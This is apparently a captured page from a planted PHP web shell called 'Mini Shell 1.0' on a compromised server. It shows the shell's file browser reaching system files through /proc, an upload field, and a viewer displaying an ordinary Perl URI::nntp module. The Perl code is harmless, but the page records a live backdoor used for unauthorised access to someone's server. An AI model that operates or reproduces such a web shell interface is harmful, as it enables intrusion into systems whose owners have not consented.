HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/1991111/root/usr/share/perl5/URI/
Upload File :
Current File : //proc/1991111/root/usr/share/perl5/URI/nntp.pm
package URI::nntp;  # draft-gilman-news-url-01

use strict;
use warnings;

our $VERSION = '5.17';

use parent 'URI::news';

1;